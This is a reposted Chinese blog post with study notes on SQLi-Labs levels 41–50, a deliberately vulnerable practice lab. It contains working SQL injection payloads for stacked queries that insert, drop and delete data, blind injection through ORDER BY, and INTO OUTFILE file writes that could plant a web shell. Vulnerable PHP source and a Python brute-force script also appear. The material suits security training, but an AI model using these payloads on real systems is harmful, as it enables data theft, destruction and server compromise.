SQLi-Labs 学习笔记(Less 41-50)

最新推荐文章于 2024-08-29 13:07:20 发布
转载 最新推荐文章于 2024-08-29 13:07:20 发布 · 1.3k 阅读 · 1
文章标签:

#SQL注入 #渗透测试 #Web安全

本文深入探讨SQL注入的各种实战技巧,包括基于错误的POST型单引号字符型注入、盲注技术、更新数据注入、以及利用ORDER BY进行的复杂注入攻击等。通过具体案例解析不同类型的SQL注入漏洞及其利用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

点击打开链接

Less-41 基于错误的POST型单引号字符型注入


先打开网页查看 Welcome Dhakkan


与之前讲的Less-40的区别:

[plain]  view plain  copy
  1. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  


当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,构建payload:

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-41/?id=1;insert into users(id,username,password) values(15,'jack','jack')%23  


Less-42


先打开网页查看 Welcome Dhakkan


Update更新数据后,经过mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在select调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。


分析源码login.php可以知道:

[plain]  view plain  copy
  1. $username = mysqli_real_escape_string($con1, $_POST["login_user"]);  
  2. $password = $_POST["login_password"];  


password并没有被过滤,我们可以利用password来注入,用户名随意填写,密码如下:

[plain]  view plain  copy
  1. a';create table jack like users#  



Less-43


与Less-42的区别在于:

[plain]  view plain  copy
  1. $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";  

payload:

[plain]  view plain  copy
  1. username:admin  
  2. password:a');drop table jack#  

Less-44


本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区别就在于没有报错信息,同时,我们使用同样方式的payload:

[plain]  view plain  copy
  1. username:admin  
  2. password:a';insert into users(id,username,password) values('15','jack','jack')#  



Less-45


与Less-43关的区别在于并没有报错信息,也就是基于盲注,payload:

[plain]  view plain  copy
  1. username:admin  
  2. password:a');delete from users where id=15#  



Less-46


先打开网页查看 Welcome Dhakkan


②查看源代码:

[plain]  view plain  copy
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
  2. <html xmlns="http://www.w3.org/1999/xhtml">  
  3. <head>  
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
  5. <title>ORDER BY-Error-Numeric</title>  
  6. </head>  
  7.   
  8. <body bgcolor="#000000">  
  9. <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>  
  10. <font size="3" color="#FFFF00">  
  11.   
  12. <?php  
  13. include("../sql-connections/sql-connect.php");  
  14. $id=$_GET['sort'];    
  15. if(isset($id))  
  16.     {  
  17.     //logging the connection parameters to a file for analysis.  
  18.     $fp=fopen('result.txt','a');  
  19.     fwrite($fp,'SORT:'.$id."\n");  
  20.     fclose($fp);  
  21.   
  22.     $sql = "SELECT * FROM users ORDER BY $id";  
  23.     $result = mysql_query($sql);  
  24.     if ($result)  
  25.         {  
  26.         ?>  
  27.         <center>  
  28.         <font color= "#00FF00" size="4">  
  29.           
  30.         <table   border=1'>  
  31.         <tr>  
  32.             <th> ID </th>  
  33.             <th> USERNAME   </th>  
  34.             <th> PASSWORD   </th>  
  35.         </tr>  
  36.         </font>  
  37.         </font>  
  38.         <?php  
  39.         while ($row = mysql_fetch_assoc($result))  
  40.             {  
  41.             echo '<font color= "#00FF11" size="3">';        
  42.             echo "<tr>";  
  43.                 echo "<td>".$row['id']."</td>";  
  44.                 echo "<td>".$row['username']."</td>";  
  45.                 echo "<td>".$row['password']."</td>";  
  46.             echo "</tr>";  
  47.             echo "</font>";  
  48.             }     
  49.         echo "</table>";  
  50.           
  51.         }  
  52.         else  
  53.         {  
  54.         echo '<font color= "#FFFF00">';  
  55.         print_r(mysql_error());  
  56.         echo "</font>";    
  57.         }  
  58.     }     
  59.     else  
  60.     {  
  61.         echo "Please input parameter as SORT with numeric value<br><br><br><br>";  
  62.         echo "<br><br><br>";  
  63.         echo '<img src="../images/Less-46.jpg" /><br>';  
  64.         echo "Lesson Concept and code Idea by <b>D4rk</b>";  
  65.     }  
  66. ?>  
  67.           
  68.           
  69. </font> </div></br></br></br>  
  70.   
  71. </center>   
  72. </body>  
  73. </html>  

(本关以下纯属复制粘贴,毕竟道理都一样)

这里涉及到order by注入的相关知识,sql语句为:
[plain]  view plain  copy
  1. $sql = "SELECT * FROM users ORDER BY $id";  

尝试?sort=1 desc或者asc,显示结果不同,则表明可以注入。(升序or降序排列)
从上述的sql语句中我们可以看出,我们的注入点在order by后面的参数中,而order by不同于的我们在where后的注入点,不能使用union等进行注入。如何进行order by的注入,我们先来了解一下mysql官方select的文档


我们可利用order by后的一些参数进行注入。首先,

(1)、order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=right(version(),1)  

没有报错,但是right换成left都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。

此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式,

①直接添加注入语句,?sort=(select ******)

②利用一些函数。例如rand()函数等。?sort=rand(sql语句)


Ps:此处我们可以展示一下rand(ture)和rand(false)的结果是不一样的


③利用and,例如?sort=1 and (加sql语句)。

同时,sql语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。


报错注入例子

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)) limit 0,1)  

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=(rand(ascii(left(database(),1)))=115)  



从上述两个图的结果,对比rand(ture)和rand(false)的结果,可以看出报错注入是成功的。


延时注入例子

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort= (select if(substring(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) from (select database() as current) as tb)  

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=1 and if(ascii(substr(database(),1,1))=118,0,sleep(5))  

上述两个延时注入的例子可以很明显的看出时间的不同,这里就不贴图了,图片无法展示延时。。。

同时也可以用?sort=1 and 后添加注入语句。这里就不一一演示了。

1、procedure analyse参数后注入

利用procedure analyse参数,我们可以执行报错注入。同时,在procedure analyse和order by之间可以存在limit参数,我们在实际应用中,往往也可能会存在limit后的注入,可以利用procedure analyse进行注入。


以下为示范例
[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=1 procedure analyse(extractvalue(rand()*2,concat(0x3a,version())),1)  

2、导入导出文件into outfile参数
[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=1 into outfile "c:/data.txt"  

那这个时候我们可以考虑上传网马,利用lines terminated by。

Into outtfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x(网马进行16进制转换)



Less-47  


与上一关的区别在于:

[plain]  view plain  copy
  1. $sql = "SELECT * FROM users ORDER BY '$id'";  


将id变为字符型,因此根据我们上述提到的知识,我们依旧按照注入的位置进行分类。


1、order by后的参数


我们只能使用and来进行报错和延时注入。我们下面给出几个payload示例。

① and rand相结合的方式,payload:

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+  


此处后期经过测试,还是存在问题的,我们不能使用这种方式进行准确的注入。此处留下只是一个示例。

②可以利用报错的方式进行

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+  


这里再放一个报错注入,原理和上面的payload是一样的,都是利用的mysql重复项的原理。

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+  



③延时注入

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+  
这里因database()为security,所以第一个字母的s的ascii为115,此处直接显示,当改为116或者其他的数字的时候,就要延时了,我们这里就不贴图展示了,可以通过脚本爆破。


2、导入导出文件into outfile参数

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-47/?sort=1' into outfile "c:/data.txt"--+  

那这个时候我们可以考虑上传网马,利用lines terminated by。

Into outtfile c:/1.txt lines terminated by 0x(网马进行16进制转换)


[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-46/?sort=1 into outfile "c:/..../data.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+  

此处的16进制文件为<?php phpinfo();?>

我们访问data.php


Less-48


这关与Less-46的区别在于没有报错信息,即盲注,payload:

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-48/?sort=(if(ascii(substr(database(),1,1))=116,0,sleep(5)))  


本关我们依旧可以用into outfile进行。


Less-49


这关与Less-47的区别在于没有报错信息,即盲注,payload:

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  


Less-50

从本关开始我们开始进行order by stacked injection!

执行sql语句我们这里使用的是mysqli_multi_query()函数,而之前我们使用的是mysqli_query(),区别在于mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,那么我们此处就可以执行多个sql语句进行注入,也就是我们之前提到的statcked injection。

这里我们上述用到的方法依旧是可行的,我们这里就不重复了,这里就看下stacked injection。

我们直接构造payload:

[plain]  view plain  copy
  1. http://localhost/sqli-labs-master/Less-50/?sort=1;create table jack like users#  


前面我们已经详述stacked injection的过程,这里就不详细讲解了.


sqli-labs 41——65关攻略
weixin_45880717的博客
02-08 1012
Less-41 基于错误的POST型单引号字符型注入 与之前讲的Less-40的区别: sql="SELECT∗FROMusersWHEREid=sql="SELECT * FROM users WHERE id=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1"; 当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,...
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 179
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
sqli-Labs————less-41
Fly_鹏程万里
05-20 590
Less-41查看源代码:&lt;?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?&gt; &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tr...
sqli-labs(50-53)
qq_43579362的博客
03-01 851
Less-50 从源码可以看出,这里执行sql语句的函数是mysqli_multi_query(),它与以往执行sql语句的函数mysqli_query()不同,它一次可执行多条语句,而以往的一次只能执行一条,所以可以使用堆叠注入,之前都做过很多堆叠注入了,所以不再演示,只是这里为字符型注入,下面把一些基础常用的sql语句进行了罗列 数据库 # 查看所有数据库 SHOW DATABASES; #创...
sqli-labs (less-44)
kukudeshuo的博客
03-15 501
sqli-labs (less-44) 进入44关,发现依然是这个页面 输入admin' 这里发现没有错误回显了,所以我们只能去猜了 admin--+ # admin'--+ 所以判断闭合方式为’#,并且为字符型注入 这里我们直接使用堆叠注入 创建一张表 a';create table test like users;# 创建一个新的用户 a';insert into users values(18,'icepeak','icepeak');# ...
sqli-Labs————less-44
Fly_鹏程万里
05-21 481
Less-44这一关与之前的一样,都是采用的堆叠注入,这里直接给出payload:username:adminpassword:aaa';create table hps like users#
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 794
继续学习sqli-labs,本篇是less17
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 775
继续学习sqli-labs,本篇是less 32-37
sqli-labs学习笔记(Less1-Less24)
极光时流
02-07 1297
sqli-labs学习笔记Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8 Less-1 select … from … where id=’$id’ 基于union联合查询 http://127.0.0.1/sqli-labs-master/Less-1/?id=0’ 报错 http://127.0.0.1/sqli-labs-master/Le...
sqli-labs/Less-50
m0_71299382的博客
11-22 414
sqli-labs第五十关
sqli-labs(41-50)
猎荒者
01-24 430
人过留名,雁过留声 人生天地间,凡有大动静处 必有猪头 Less 41 ① 源码分析 参数直接获取 参数直接拼接(数字型注入) 有数据回显 没有错误信息回显(也无伤大雅,构造的payload如果有错就没有回显而已) mysqli_multi_query()堆叠注入 ② 漏洞利用 可以先通过普通注入获取数据库,数据表,数据列,字段名 然后结合堆叠注入再进行进一步操作,思路和 Less39 差...
sqli-labs通关(41-
m0_73771249的博客
08-29 1582
整数闭合,共有3列。
sqli-labs (less-40)
kukudeshuo的博客
03-14 561
sqli-labs (less-40) 进入40关,输入id=1 http://127.0.0.1/sql1/Less-40/?id=1' #无错误回显 因为没有错误回显,所以我们一个一个去猜闭合的方式 http://127.0.0.1/sql1/Less-40/?id=1'--+ #回显错误 http://127.0.0.1/sql1/Less-40/?id=1')--+ #回显正常 这里我们不使用union注入,我们使用堆叠注入攻击 创建一张表 http://127.0.0.1/sql1/Le
sqli-Labs————less-40
Fly_鹏程万里
05-20 1160
Less-40查看源代码:&lt;?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?&gt; &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tr...
sqli-labs 41---64
hecker_chicken的博客
02-16 570
Sqli-labs Less-41 本关没有回显位置 采用盲注 ?id=1 and left(version(),1)=5%23(注入成功 显示) 联合注入?id=0 union select 1,database(),version()–+ (无闭合) 我在sql注入天书看到另外一种方法 index.php?id=1; insert into users(id,username,passw...
sqli-labs通关(less41~less50
箭雨镜屋
09-16 2365
Less41 这关和Less40差不多,先通过布尔盲注来
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
m0_54899775的博客
12-28 861
sqli-labs Less-50、51、52、53(sqli-labs闯关指南 50、51、52、53)— orderby stacked injection
sqlilabs less-40~41
TA不懒,但还没有添加简介
08-03 258
sqlilabs less-40~41
sqli-labs- less7
最新发布
12-28
### SQLi-7 教程与解决方案 #### 背景介绍 SQL注入是一种常见的攻击方式,通过向应用程序输入恶意的SQL语句来操纵数据库查询。SQLi-Labs 是一个用于练习和学习SQL注入技术的平台。 #### Less-7 特点分析 Less-7 主要关注基于布尔盲注(Boolean-based Blind Injection)的技术[^1]。这种类型的注入不依赖于错误消息返回具体的信息,而是利用条件判断来推断数据的存在与否。 #### 实验环境搭建 为了进行实验,确保已经安装并配置好了PHP服务器以及MySQL数据库,并且成功部署了SQLi-Labs项目文件夹下的`/sqli/Less-7/`目录中的脚本[^2]。 #### 测试用例准备 访问目标URL `http://localhost/sqli-labs/Less-7/?id=` 并尝试不同的参数值来进行测试。对于布尔盲注来说,通常会构造一些能够引起不同页面响应的行为模式作为基础: - 正常情况:当ID存在时显示正常的内容; - 错误情况:如果不存在对应的记录,则可能给出空白页或其他提示信息; #### 注入点发现 在Less-7中,`id` 参数是一个潜在的注入点。可以先验证是否存在SQL注入漏洞,比如发送请求 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='1` 和 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='2` 来观察是否有区别性的反应。 #### 数据库版本探测实例 一旦确认了注入的可能性之后,就可以进一步探索更多细节。例如获取当前使用的 MySQL 版本号可以通过如下方法实现: ```sql http://localhost/sqli-labs/Less-7/?id=-1 UNION SELECT @@version -- ``` 此命令将会把 `-1` 替换成实际存在的 ID 值加上联合选择操作符 (`UNION`) ,从而执行第二个查询并将结果集附加到原始查询的结果集中展示出来。 #### 字符串长度枚举技巧 假设想要知道管理员用户名的具体字符数,那么可以根据ASCII码表逐位猜测直到找到匹配为止。下面是一段Python代码片段用来自动化这个过程: ```python import requests url = "http://localhost/sqli-labs/Less-7/" payload_true = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))={}--" payload_false = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))!={}--" for i in range(1, 20): for j in range(32, 128): r = requests.get(url + payload_true.format(i,j)) if "You are in" in r.text: print(chr(j), end='') break print() ``` 这段程序将依次遍历每一个位置上的字母直至整个字符串被还原完毕。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值